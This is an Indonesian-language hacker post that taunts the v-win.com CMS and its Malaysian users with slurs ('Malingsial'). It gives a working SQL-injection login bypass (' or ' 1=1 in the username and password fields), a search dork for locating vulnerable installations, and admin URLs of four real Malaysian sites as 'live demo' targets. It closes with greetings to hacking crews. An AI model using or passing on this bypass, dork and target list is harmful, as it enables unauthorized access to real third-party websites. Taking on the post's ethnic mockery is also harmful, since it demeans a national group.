STUPID SQL INJECTION @ STUPID MALINGSIAL CMS
Kembali ditemukan kebodohan pada malingsial CMS….
Kebodohan yang teramat sangat bodoh untuk sebuah CMS yang berbayar…
JANGAN MAU MEMAKAI PRODUK-PRODUK MALINGSIAL…!!!
KARENA MALINGSIAL BENAR-BENAR BODOH, BAHKAN UNTUK INJEKSI SEMACAM INI PUN MALINGSIAL TIDAK MAMPU MENANGANINYA…
LANGSUNG SAJA SAYA BERIKAN INFORMASINYA
===========================================================
Nama CMS : WEB-CMS – V-WIN.COM CMS [MALINGSIAL STUPID CMS]
Vendor : V-WIN.COM [MALINGSIAL GITU LOCH]
Author : http://serverisdown.org
Dork : “Concept, Designed, and Maintained by www.v-win.com”
===========================================================
EXPLOIT :
JUST USING STUPID INJECTION IN LOGIN PAGES
USERNAME : admin ‘ or ‘ 1=1
PASSWORD : ‘ or ‘ 1=1
BENAR-BENAR BODOH…!!!!!!
ADMIN PAGES DAPAT DITEMUKAN PADA
http://site.com/path/admin
Live Demo :
http://www.peps.org.my/admin/
http://www.graduanbersatu.com/admin
http://www.cocoa.com.my/admin/
http://www.kasturi.edu.my/admin/
Enjoy..!!!!
===========================================================
Greets
Jack, kecemplungkalen, tukulesto, h4ckerku, serverisdown,
Tr1993r_m4ch1n3, bL4ck_3n91n3, Ninj4_bLu3, D30B4, giLLa,
#noscan crew, EminEm, Coco_nk4l, yOrz, Vrs-hCk, M364TR0N,
CYB3R_TR0N, putrislankers team, SasaIndaHoz,
surabayahackerlink, mainhack brotherhood, anggrek hackers™
MALINGSIAL SERVER IS DOWN
http://malingsial.serverisdown.org


